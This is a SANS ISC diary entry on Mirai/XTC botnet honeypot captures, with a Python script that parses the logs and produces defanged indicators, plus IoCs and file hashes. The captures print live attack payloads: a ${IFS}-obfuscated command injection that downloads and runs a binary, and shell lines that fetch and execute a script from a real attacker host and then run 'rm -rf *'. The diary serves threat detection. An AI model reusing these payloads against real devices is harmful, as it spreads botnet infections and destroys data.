SANS ISC: Mirai Botnet Activity

This past week I noticed new activity from the Mirai botnet in my honeypot. Each entry below lists the capture time, the honeypot address and port, the source address and port (see [4] and [7] for the sources), and the raw payload. The first entry is a POST to /cgi-bin/mainfunction.cgi with User-Agent: XTC whose keyPath parameter carries an injected shell command; it substitutes ${IFS} for spaces to fetch an ARM7 binary from 96.30.193.26 into /tmp/viktor, make it executable and run it. That file appears to have been taken down, although the IP showed up multiple times this week, including today [6]. However, the download host in the last two entries from today is still active [5]: it serves a Bash script that fetches binaries built for various device architectures (MIPS, ARM4-7, MPSL, x86, PPC, M68k). Also of interest are the User-Agent XTC and the file name viktor, both of which appear to be linked to the XTC IRC botnet, aka Hoaxcalls [2][3].

  • 20200613-025717: 192.168.25.9:80-115.85.32.210:55065 data 'POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1\r\nContent-Length: 189\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\naction=login&keyPath='wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'
  • 20200613-101614: 192.168.25.9:8088-36.82.97.160:41885 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'
  • 20200613-101617: 192.168.25.9:8088-36.82.97.160:33090 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'
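The capture format above (timestamp, honeypot IP:port, source IP:port, quoted payload) lends itself to automated triage. The following Python is an added example, not code from the diary or from the honeypot software: it parses lines in that format, undoes the ${IFS} spacing trick seen in the first entry, and pulls out the download URLs, the files that get chmod'ed, and the User-Agent, then defangs them into an IoC summary like the list further down. The three input lines are the diary's own captures; the Hit/analyze/summarize names and the KNOWN_BAD_AGENTS set are assumptions of the example.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# The three capture lines below are copied from the diary. Everything else in
# this block (names, regexes, the KNOWN_BAD_AGENTS set) is this example's own
# assumption and not part of any honeypot tool.
LOG_LINES = [
    r"20200613-025717: 192.168.25.9:80-115.85.32.210:55065 data 'POST /cgi-bin/mainfunction.cgi HTTP/1.1\r\nUser-Agent: XTC\r\nHost: 127.0.0.1\r\nContent-Length: 189\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\naction=login&keyPath='wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor'&loginUser=a&loginPwd=a\r\n\r\n'",
    r"20200613-101614: 192.168.25.9:8088-36.82.97.160:41885 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'",
    r"20200613-101617: 192.168.25.9:8088-36.82.97.160:33090 data 'cd /tmp; wget http://185.172.111.214/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf *\r\n\r\n'",
]

# <timestamp>: <honeypot ip>:<port>-<source ip>:<port> data '<payload>'
LINE_RE = re.compile(
    r"^(?P<ts>\d{8}-\d{6}): (?P<dst_ip>[\d.]+):(?P<dst_port>\d+)-"
    r"(?P<src_ip>[\d.]+):(?P<src_port>\d+) data '(?P<payload>.*)'$"
)
URL_RE = re.compile(r"https?://[^\s'\"&;]+")
CHMOD_RE = re.compile(r"chmod\s+\d+\s+([^\s;]+)")
UA_RE = re.compile(r"^User-Agent:\s*(.+)$", re.MULTILINE)

# Assumption: the agent string the diary ties to XTC/Hoaxcalls.
KNOWN_BAD_AGENTS = {"XTC"}


def decode_payload(raw: str) -> str:
    """Turn the logged escape text back into the text the attacker sent and undo
    the ${IFS} trick: IFS expands to whitespace, so 'wget${IFS}http://...' runs
    as 'wget http://...' while slipping past naive filters that reject spaces."""
    text = raw.replace(r"\r\n", "\n")
    return text.replace("${IFS}", " ")


def defang(url: str) -> str:
    """Defang the way the diary's IoC list does: bracket the last dot of the
    host and, if present, the last dot of the file name."""
    p = urlparse(url)
    host = "[.]".join(p.netloc.rsplit(".", 1))
    path = p.path
    if "." in path.rsplit("/", 1)[-1]:
        base, ext = path.rsplit(".", 1)
        path = f"{base}[.]{ext}"
    return f"{p.scheme}://{host}{path}"


@dataclass
class Hit:
    timestamp: str
    src_ip: str
    dst_port: int
    user_agent: Optional[str]
    ifs_obfuscated: bool
    urls: List[str] = field(default_factory=list)
    dropped_files: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.urls) or self.ifs_obfuscated or self.user_agent in KNOWN_BAD_AGENTS


def analyze(line: str) -> Optional[Hit]:
    """Parse one capture line; returns None for lines not in the honeypot format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    payload = decode_payload(m["payload"])
    ua = UA_RE.search(payload)
    return Hit(
        timestamp=m["ts"],
        src_ip=m["src_ip"],
        dst_port=int(m["dst_port"]),
        user_agent=ua.group(1).strip() if ua else None,
        ifs_obfuscated="${IFS}" in m["payload"],
        urls=URL_RE.findall(payload),
        dropped_files=CHMOD_RE.findall(payload),
    )


def summarize(lines: List[str]) -> dict:
    """Aggregate suspicious hits into a defanged indicator set."""
    hits = [h for h in map(analyze, lines) if h and h.suspicious]
    return {
        "urls": sorted({defang(u) for h in hits for u in h.urls}),
        "user_agents": sorted({h.user_agent for h in hits if h.user_agent}),
        "sources": sorted({h.src_ip for h in hits}),
        "dropped_files": sorted({f for h in hits for f in h.dropped_files}),
        "ifs_obfuscated_count": sum(h.ifs_obfuscated for h in hits),
    }


if __name__ == "__main__":
    for key, value in summarize(LOG_LINES).items():
        print(f"{key}: {value}")
```

Running the block against the three captures yields the two defanged download URLs, the XTC agent, the two source addresses, and /tmp/viktor and 8UsA.sh as the files made executable; only the first capture is flagged as ${IFS}-obfuscated. The URL and chmod regexes are deliberately loose because loader one-liners vary in spacing and separators; tighten them only if you see false positives on your own captures.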

Indicators of Compromise

  • http://96.30.193[.]26/arm7
  • http://185.172.111[.]214/8UsA[.]sh
  • User-Agent: XTC

Suspicious Files and Scripts (SHA256):

  • UnHAnaAW.sh4 - 5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1 [1]
  • 8UsA.sh - 590d00e051703e55be2ad10fa94eadc499262bf8a62190a648a7a2756fd31862

[1] https://www.virustotal.com/gui/file/5d646c4f5d1793a6070bb03b069f263529b4bc470ab4d5960ae55a211eb9b2f1/detection
[2] https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/
[3] https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/
[4] https://isc.sans.edu/ipinfo.html?ip=115.85.32.210
[5] https://isc.sans.edu/ipinfo.html?ip=185.172.111.214
[6] https://isc.sans.edu/ipinfo.html?ip=96.30.193.26
[7] https://isc.sans.edu/ipinfo.html?ip=36.82.97.160

-----------
Guy Bruneau, IPSS Inc.
ISC Handler
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu
Jun 13th 2020